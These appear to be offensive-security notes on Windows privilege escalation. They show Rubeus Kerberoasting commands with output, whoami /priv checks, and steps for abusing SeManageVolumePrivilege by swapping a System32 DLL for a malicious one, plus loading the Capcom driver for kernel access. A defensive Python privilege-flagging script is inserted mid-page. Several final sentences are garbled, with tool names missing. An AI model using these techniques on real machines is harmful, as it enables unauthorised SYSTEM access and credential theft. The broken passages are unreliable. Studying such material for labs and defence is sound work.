Sometimes the way to escalate privileges is to move laterally: the same techniques and tools we would use for lateral movement can be turned to escalating our own privileges.
Kerberoasting with Rubeus
If Rubeus is not installed we'll have to switch to our Windows dev box and compile it with Visual Studio. We can then transfer the binary back to our Kali host and from there to the victim.
PS C:\Tools> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : corp.com
[*] Searching path 'LDAP://DC1.corp.com/DC=corp,DC=com' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : iis_service
[*] DistinguishedName : CN=iis_service,CN=Users,DC=corp,DC=com
[*] ServicePrincipalName : HTTP/web04.corp.com:80
[*] PwdLastSet : 9/7/2022 5:38:43 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Tools\hashes.kerberoast
Another way to check which groups a user belongs to is with net user:
PS C:\Users\tony> net user tony
User name tony
Full Name Nothing Stops
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/16/2023 1:57:34 PM
Password expires Never
Password changeable 6/16/2023 1:57:34 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *None
Runas Command
PS C:\Users\steve> runas /user:backupadmin cmd
Enter the password for backupadmin:
Attempting to start cmd as user "CLIENTWK220\backupadmin" ...
PS C:\Users\steve>
NOTE: If stuck, or unsure: ippsec.rocks is a great source to walk you through the exploitation of these token privileges.
The first thing to do after popping a Windows shell is to check the privileges held by the current user's token.
C:\Users\svc_mssql>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
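A small triage helper, added here as an example and not part of the original notes: it parses the table that whoami /priv prints and flags the privileges that are commonly abusable when a low-privileged account holds them (the volume-maintenance and driver-loading privileges discussed on this page among them). The risk list and the sample output below are assumptions and constructed from the output shown above; the check is equally useful for auditing service accounts from the defender's side.

```python
import re

# Privileges worth flagging when an ordinary or service account holds them.
# The explanations are short summaries of what each privilege grants.
HIGH_RISK_PRIVILEGES = {
    "SeManageVolumePrivilege": "raw volume access; can lead to arbitrary file writes on C:\\",
    "SeLoadDriverPrivilege": "load and unload kernel-mode drivers",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open any process, including SYSTEM processes",
    "SeTakeOwnershipPrivilege": "take ownership of securable objects",
}

# One table row: name, free-text description, then Enabled/Disabled.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Parse `whoami /priv` table output into (name, description, state) tuples."""
    rows = []
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(2).strip(), m.group(3)))
    return rows


def flag_risky(rows):
    """Return the high-risk privileges the token holds as (name, state, why).

    'Disabled' only means the privilege is not currently enabled in the token;
    it is still held and the process can enable it, so it is reported too.
    """
    return [(name, state, HIGH_RISK_PRIVILEGES[name])
            for name, _desc, state in rows if name in HIGH_RISK_PRIVILEGES]


# Constructed sample: the `whoami /priv` output shown on this page.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                      State
============================= ================================ ========
SeMachineAccountPrivilege     Add workstations to domain       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking         Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set   Disabled
"""

if __name__ == "__main__":
    for name, state, why in flag_risky(parse_whoami_priv(SAMPLE)):
        print(f"{name} ({state}): {why}")
```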
Running this exploit (SeManageVolumeExploit.exe, below) gives us read, write and execute access to the whole C:\ drive. We can then create any PE or DLL and execute it; to gain SYSTEM we replace an existing DLL with a malicious one.
Run exploit
C:\Users\svc_mssql> .\SeManageVolumeExploit.exe
Create a malicious DLL and use it to replace one in C:\Windows\System32\wbem\
This privilege allows us to load and unload drivers in kernel mode, including malicious ones. TLDR: very bad. The common approach is to load the "Capcom" driver, as it is easy to exploit. We download the driver source to our Windows VM, compile it, transfer it to the vulnerable machine and load the driver.
Follow this blog post and download Capcom and the required files:
If we've gained access to a plaintext password, it's possible to use the command to execute commands as that user.
If we've gained access to a plaintext password, but don't have a full shell, we can use the command that's part of the. Here is an updated and new version.
Run it and you will have access to C:\Windows\System32. If that doesn't work (sometimes it doesn't), we can use the exploit instead. We can build it on our dev box.